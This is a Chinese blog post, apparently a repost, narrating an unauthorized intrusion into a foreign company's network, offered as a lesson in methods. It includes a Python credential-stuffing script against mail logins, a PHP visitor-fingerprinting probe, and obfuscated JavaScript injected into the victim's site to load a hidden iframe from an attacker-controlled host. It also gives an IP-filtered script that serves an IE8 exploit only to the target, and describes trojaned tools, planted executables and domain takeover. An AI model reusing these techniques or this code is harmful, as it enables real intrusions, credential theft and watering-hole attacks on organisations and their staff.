o2o网站建设包括哪些,linux做网站服务器,内网做网站外网访问,竞价排名广告文章均由自己原创#xff0c;只是一直没有在自己博客发表。本地附件也没有了#xff0c;我是从网上找来我的以前的投稿。 写在之前的废话#xff1a;小菜技术能力不行#xff0c;如果你觉得此文实在看不下去#xff0c;还请PASS掉。如果你对我的文章有兴趣#xff0c;可以… 文章均由自己原创只是一直没有在自己博客发表。本地附件也没有了我是从网上找来我的以前的投稿。 写在之前的废话小菜技术能力不行如果你觉得此文实在看不下去还请PASS掉。如果你对我的文章有兴趣可以与我一起交流。文章因为敏感无图业内人士看看自然懂。 由于XXX耗时长需要的支持多而且目标敏感。在这里我们不便介绍目标背景也不多说其他的直接来进入主题。 某国某目标我盯了它大概半年。嗯终于有一天我觉得时机成熟下手吧。 在渗透目标的前期我们需要了解对方公司的安全意识。以及需要搜集所有网站的IP公司的出口以及公司网段所存在的B-C段公司人员邮箱公司人员爱好facebook等信息。 首先我把目标公司的WEB都给搜集好了大公司一般C段都是在一起的。而我有个习惯在渗透目标的时候先喜欢把OWA的段找出来扫一下。这样大概的就知道了公司的架构情况。而很多时候大公司都是会把WEB段给区分的哪几个外网IP段是管理WEB的哪几个段是放数据库的。不过随着网络越趋复杂就算拿到了WEB 也就是在DMZ徘徊。不过只要拿到了WEB就好说了。Go把。 千辛万苦拿下来了这个公司的一个WEBWEB如何拿下来咱们不多说。不是重点。当我分析内网情况的时候环境就是在DMZsystem权限。通过判断协议TCP HTTP都没问题。于是我把DMZ WEB给中了一个马这样更容易操作至少得到了一个交互式的shell。先把远控抛开不说通过netstat -ano分析。WEB服务器连上了在内部的一台数据库服务器。于是我找到了WEB服务器的web.config脚本成功得到了数据库账户密码但是数据库账户权限非SA而且SQL SERVER版本是2008悲剧MSSQL 2000的话直接就远程溢出了.没办法就算我们导了个shell又有何用不着急慢慢分析于是我试着去ping内网数据库机器PING不通接着我在拿S扫描器开了很小的线程扫了扫WEB连接的数据库那台机器。和我猜想的结果是一样这种情况我不是第一次碰到了。就只有个1433能够过去。这时我猜想大概的内网架构是这样的 WEB–防火墙–数据库服务器–内网而当我搞下来发现情况并不是这样的 算了没办法。先不管了连上数据库分析数据看能否去撞号登OWA或者邮箱之类的。 于是写了个PYTHON脚本去跑他们的OWA这个脚本是N年前写的可能不太符合大家去改改就好了。原理差不多 import smtplib ,sys ,timedef main():server smtp.live.com #gmail smtp.gmail.com, yahoo smtp.mail.yahoo.comfp open(D:\python\\hotmail.txt)fp1 open(d:\python\\save.txt, a)while 1:line fp.readline()uandp line.split( )name uandp[0]name name.split()[0]pwd uandp[1]pwd pwd.split(\n)[0]try:smtp smtplib.SMTP_SSL(server,465) # gmail 465except:print [*]Connect Error.sys.exit(0)passtry:#smtp.set_debuglevel(1)#smtp.ehlo()#smtp.starttls()smtp.ehlo()smtp.login(name,pwd)except:print [-]:%s:%s % (name, pwd)pass#time.sleep(1)else:out []:%s:%s\n % (name, pwd)print outfp1.write(out)fp1.flush()smtp.quit()smtp.close()fp.close()fp1.close()if __name____main__:main() 分析完数据把数据库中的目标人物邮箱都给挑选出来。跑完。手工测试VPN都失败了。没办法继续另寻其他的路子。 来回到远控通过分析本机WEB有一个员工登录的地方但是是.NET的。不能改代码。因为如果改写代码需要重新编译这里可能我说的有错。但是有一个员工登录的地方我们就已经足够了这里也先不管它。先分析再说。 我的远控是可以切换用户的只要有用户在可以切换到对方的用户下。首先分析了本地管理组的用户抓密码。Query user 发现有几个用户在线。于是我切换到每个用户主要就是查看IPC 。功夫不负有心人当我切换到B的会话下的时候NET USE看了看。大家猜我看到了啥可能你会想咱们不是在DMZ吗会话咋来的 管理员从内网连过来。 C:\ProgramDatagt;net useNew connections will be remembered.Status Local Remote Network-------------------------------------------------------------------------------\\TSCLIENT\C Microsoft Terminal Services\\TSCLIENT\D Microsoft Terminal Services\\TSCLIENT\E Microsoft Terminal Services\\TSCLIENT\F Microsoft Terminal ServicesThe command completed successfully. 没错管理员从内网连接过来把盘给带过来了。这下有得玩了。于是我分析了连接过来的那个盘。通过netstat -ano 知道了带过盘来的那机器的IP。赶紧分析知道了对方是管理员在OWA的MAILBOX服务器上链接过来的。搞的多的就知道MAILBOX是没WEB的当然也有。MAILBOX主要的作用就是来存储MAIL的邮件数据。于是我CURL,S扫描了服务器的那个段。一样的我DMZ怎么都过不去而且对方常用端口也没开。如果开了咱们直接复制个shell就过去本地借用内网那台服务器执行命令就可以了。但是环境不允许我们这么容易就进入别人内网扭转了几天还是没办法当我最后分析到另外一个盘符的时候我竟然看到了IT服务器的一个盘里面有IT部门的一部分密码。赶紧下载分析。这样基本上我判断域管可能在里面。于是我来到VPN一个一个测试竟然都失败了。心想FUCK肯定这个是一个小域没有VPN可以有权限登录。然后在一个一个来测试OWA竟然登录进去了一个。分析所有邮件搜索关键字PASSWORD FTP RDP SERVER,HACKER。等字眼。没有所获就看到一封说近期有人在搞他们公司需要加强安全防范的邮件当然不是我。。可能这时候很多人想发邮件绑马 如果说你有0DAY或者免杀好的NDAY可以这样做。不然就是找死了。 这个时候我还是信心满满的不是有IT部门的盘吗 嘿嘿下载了几个常用的工具比如VPN补丁。绑马了在传上去。还给CMD绑了个马放到了MAILBOX的c:\users\**\desktop 把每个用户桌面上都放了一个CMD.EXE。就不相信管理员不运行。 等啊等啊等了差不多半个月。没任何反映决定还是自己出手。不然就被动连WEB掉了都不好了。 从网上找代码自己改写了一个PHP在WEB服务器上挂了一个探针。这里有个小知识WEB服务器不是http协议的而是https来进行访问的所以我们需要找一个https的网站绿标的那种不然你是探针不到任何信息的。说做就做HTTPS绿标的网站我多的是而PHP代码简单改写代码如下 function getBrowse() { global $_SERVER; $Agent $_SERVER[HTTP_USER_AGENT]; $browser ; $browserver ; $Browser array(Lynx, MOSAIC, AOL, Opera, JAVA, MacWeb, WebExplorer, OmniWeb); for($i 0; $i lt; 7; $i ){ if(strpos($Agent, $Browsers[$i])){ $browser $Browsers[$i]; $browserver ; } } if(ereg(Mozilla, $Agent) amp;amp; ereg(Maxthon, $Agent)){ $temp explode(Maxthon/, $Agent); $Part $temp[1]; $temp explode( , $Part); $browserver $temp[0]; $browser Maxthon; } if(ereg(Mozilla, $Agent) amp;amp; ereg(Chrome, $Agent) amp;amp; !ereg(Maxthon, $Agent)){ $temp explode(Chrome/, $Agent); $Part $temp[1]; $temp explode( , $Part); $browserver $temp[0]; $browser Chrome; } if(ereg(Mozilla, $Agent) amp;amp; ereg(Opera, $Agent)) { $temp explode((, $Agent); $Part $temp[1]; $temp explode(), $Part); $browserver $temp[1]; $temp explode( , $browserver); $browserver $temp[2]; $browserver preg_replace(/([d.])/, \1, $browserver); $browserver $browserver; $browser Opera; } if(ereg(Mozilla, $Agent) amp;amp; ereg(MSIE, $Agent)){ $temp explode((, $Agent); $Part $temp[1]; $temp explode(;, $Part); $Part $temp[1]; $temp explode( , $Part); $browserver $temp[2]; $browserver preg_replace(/([d.])/,\1,$browserver); $browserver $browserver; $browser Internet Explorer; } if($browser ! ){ $browseinfo $browser. .$browserver; } else { $browseinfo Unknow Browser; } return $browseinfo; } function getIP() {return isset($_SERVER[HTTP_X_FORWARDED_FOR])?$_SERVER[HTTP_X_FORWARDED_FOR]:(isset($_SERVER[HTTP_CLIENT_IP])?$_SERVER[HTTP_CLIENT_IP]:$_SERVER[REMOTE_ADDR]);}function getOS () { global $_SERVER; $agent $_SERVER[HTTP_USER_AGENT]; $os false; if (eregi(win, $agent) amp;amp; strpos($agent, 95)){ $os Windows 95; } else if (eregi(win 9x, $agent) amp;amp; strpos($agent, 4.90)){ $os Windows ME; } else if (eregi(win, $agent) amp;amp; ereg(98, $agent)){ $os Windows 98; } else if (eregi(win, $agent) amp;amp; eregi(nt 6.1, $agent)){ $os Windows 7; }else if (eregi(win, $agent) amp;amp; eregi(nt 6, $agent)){ $os Windows Vista; } else if (eregi(win, $agent) amp;amp; eregi(nt 5.1, $agent)){ $os Windows XP; } else if (eregi(win, $agent) amp;amp; eregi(nt 5, $agent)){ $os Windows 2000; } else if (eregi(win, $agent) amp;amp; eregi(nt, $agent)){ $os Windows NT; } else if (eregi(win, $agent) amp;amp; ereg(32, $agent)){ $os Windows 32; } else if (eregi(linux, $agent)){ $os Linux; } else if (eregi(unix, $agent)){ $os Unix; } else if (eregi(sun, $agent) amp;amp; eregi(os, $agent)){ $os SunOS; } else if (eregi(ibm, $agent) amp;amp; eregi(os, $agent)){ $os IBM OS/2; } else if (eregi(Mac, $agent) amp;amp; eregi(PC, $agent)){ $os Macintosh; } else if (eregi(PowerPC, $agent)){ $os PowerPC; } else if (eregi(AIX, $agent)){ $os AIX; } else if (eregi(HPUX, $agent)){ $os HPUX; } else if (eregi(NetBSD, $agent)){ $os NetBSD; } else if (eregi(BSD, $agent)){ $os BSD; } else if (ereg(OSF1, $agent)){ $os OSF1; } else if (ereg(IRIX, $agent)){ $os IRIX; } else if (eregi(FreeBSD, $agent)){ $os FreeBSD; } else if (eregi(teleport, $agent)){ $os teleport; } else if (eregi(flashget, $agent)){ $os flashget; } else if (eregi(webzip, $agent)){ $os webzip; } else if (eregi(offline, $agent)){ $os offline; } else { $os Unknown; } return $os; } 这里贴的PHP代码并非完整的大家可以自己去改写。 脚本的功能是获取来源IP,OS,浏览器版本等等。当然如果你觉得还少你可以加入探针JAVA,FLASH的一些功能。这里不在多说。 于是来到WEB主站查看主页调用的JS。在JS里插入一段混淆代码。 eval(function(p,a,c,k,e,d){efunction(c){return(clt;a?:e(parseInt(c/a)))((cc%a)gt;35?String.fromCharCode(c29):c.toString(36))};if(!.replace(/^/,String)){while(c--)d[e(c)]k[c]||e(c);k[function(e){return d[e]}];efunction(){return\\w};c1;};while(c--)if(k[c])pp.replace(new RegExp(\\be(c)\\b,g),k[c]);return p;}(5.6(lt;1 4\\2://3//9.a\\ 70 80gt;lt;/1gt;);,11,11,|iframe|https|xxx|src|document|write|height|width|Ie|php.split(|),0,{})) 而原型如下 document.write(lt;iframe src\https://xxx//Ie.php\ height0 width0gt;lt;/iframegt;); 接下来我们要做的就是分析来源IP等待了几天以后。我查看了探针的地址。记录了不少IP.但是那么多IP应该如何来确定哪个是他们的出口IP呢 没办法偷懒把写了个PYTHON脚本 #!/usr/bin/env python#-*- coding:utf-8 -*-import sysimport threadingimport httplibimport reimport timeclass Myclass(threading.Thread):def __init__(self,host,path):threading.Thread.__init__(self)self.host hostself.path pathself.result []def run(self):if https:// in self.host:conn httplib.HTTPSConnection(self.host,80,None,None,False,10)else:conn httplib.HTTPConnection(self.host,80,False,10)i_headers {User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-Us; rv:1.9.1) Gecko/20090624 Firefox/3.5,Accept: text/plain}conn.request(GET,self.path,headers i_headers)r1 conn.getresponse()text r1.read()text1 text.lstrip()#size text.count(\n)test open(ip.txt,a)test.write(text1)b open(ip.txt,r)c open(ids.txt,w)for line in b.readlines():m re.search(r(IP:\d*.\w*.\d*.\d*.\d*),line) mm m.group(0)owa mm.replace(IP:,).strip().replace(\n,)self.result owa.replace(\n,)c.write(self.result)c.write(\n)#print write successg open(ids.txt,r)for lines in g.readlines():getsip lines.replace(\n,)try:conns httplib.HTTPConnection(bgp.he.net,80,False,10)except Exception:print [-]:connection out timebreakelse:conns.request(GET,/ip/%s % getsip,headers i_headers)r2 conns.getresponse()texts r2.read()try:line_split re.search(r(lt;ugt;.*\d\D.*.title),texts)obj line_split.group(0)print server:,obj.replace(lt;ugt;,).replace(lt;/ugt;,).replace(\n,).replace((lt;a href\,search domain:).replace(\ title,).replace(/dns/,)except Exception, e:passtime.sleep(5)#print line_splitdef main():if len(sys.argv) lt; 3:print [*]:Usage python info.py 127.0.0.1 /pathsys.exit(1)Mythread Myclass(sys.argv[1],str(sys.argv[2]))Mythread.start()if __name__ __main__:main() 这个脚本的功能是先把目标网站记录的IP地址全部给读取下来在本地保存为TXT在循环依次读取一个IP来到接口bgp.he.net 这个接口查询。至于如何分辨公司出口IP不在多说了。看IP信息以及访问源就知道了。 成功获取到对方公司的出口IP接下来就好办了。知道对方用的浏览器版本OS等等。 于是先决定先测试ie8的漏洞网上找了个IE8的漏洞。本地WIN7 XP测试没问题因为对方公司还是有人在用IE8win7默认就是IE8。但是网上找的IE8的漏洞都是被杀的不行的于是心想自己做把。 于是网上找了一个BASE64 JS解密脚本把IE8的网马内写了几个函数把核心代码都给放到函数里。然后直接把函数内都给BASE64加密了。OK很简单把不杀了。 但是我们在挂马的时候并不是瞎挂。而是必须有针对性的挂不然你挂上杀毒软件一下把你样本给抓走了。改天又出这报告又出那报告的。多丢人。那就得需要一个定向挂马的脚本了。因为对方的HTTPS的我VPS上没装HTTPS的证书心想直接就通过WEBSHELL把这串代码放到绿标的HTTPS网站上就好了。 定向挂马脚本如下 function check_ip(){$ALLOWED_IParray(192.168.2.*,目标公司出口IP);$IPgetIP();$check_ip_arr explode(.,$IP);if(!in_array($IP,$ALLOWED_IP)) {foreach ($ALLOWED_IP as $val){if(strpos($val,*)!false){$arrarray();$arrexplode(., $val);$bltrue;for($i0;$ilt;4;$i){if($arr[$i]!*){if($arr[$i]!$check_ip_arr[$i]){$blfalse;break;}}}if($bl){return;die;}}}header(HTTP/1.1 403 Forbidden);exit();die;} else{ 脚本的else后头就是调用的那个网马了。 我把这个脚本和IE网马都给放到了绿标的网站上于是重新在目标网站上把探针去了。加入咱们的PHP脚本地址远程调用。接下来要做的事情就是等着把。 谁没成想刚挂上没5分钟目标公司人中了我的网马上线了。擦噢这人品不是一般的好。 赶紧把代码给取了。做内网渗透去了。而当我们到达内网的时候内网情况却是这样的 DMZ- WAF- mailbox(我来到了这台服务器上)- IDS/IPS- 另外的域- 主域 妈的额好麻烦。没办法啦。之前拿下来了IT的管理密码的清单先把当前域搞下来再说。毫无悬念的直接连上了当前的域控制了OWA SERVER。擦屁股走人远控上操作去了。 虽然拿下来了这个域但是这个域内就那么几十台个人机而目标公司是几万人看样子这个是他们的一个分的部门。只有继续深入了。 接下来我们要找的就是其余域的其他网段了我ping了下目标公司的主站www.xxoo.com,嗯内网IP地址是10.xx.xx.xx嗯虽然能够PING通但是IPC这些都是不行的。接下来要做的就是打入其他域搞定其他域慢慢深入。 于是把目标个公司所有域名全部给搜集起来在内网一个一个ping把返回是内网的IP地址都给记录下来。 然后把朋友写的扫描器指定线程上去扫常用的WEB框架数据库之类的东西。 预知后事如何还请听下回分解。谢谢。 目前主域已经搞下来了但是无奈没域管好不容易抓到。但是被BIT9发现我了把我又T出来了。还是得慢慢来不着急慢慢分析把。下回且听分析如何绕过防范不严的BIT9。 很多人看了文章可能会觉得我说的太笼统了倒是。我不可能那么详细的说出来一些东西但是如果你能够在这个文章里学习到新的思路那就是我写这个文章的目的。 转载于:https://www.cnblogs.com/killbit/p/4850250.html
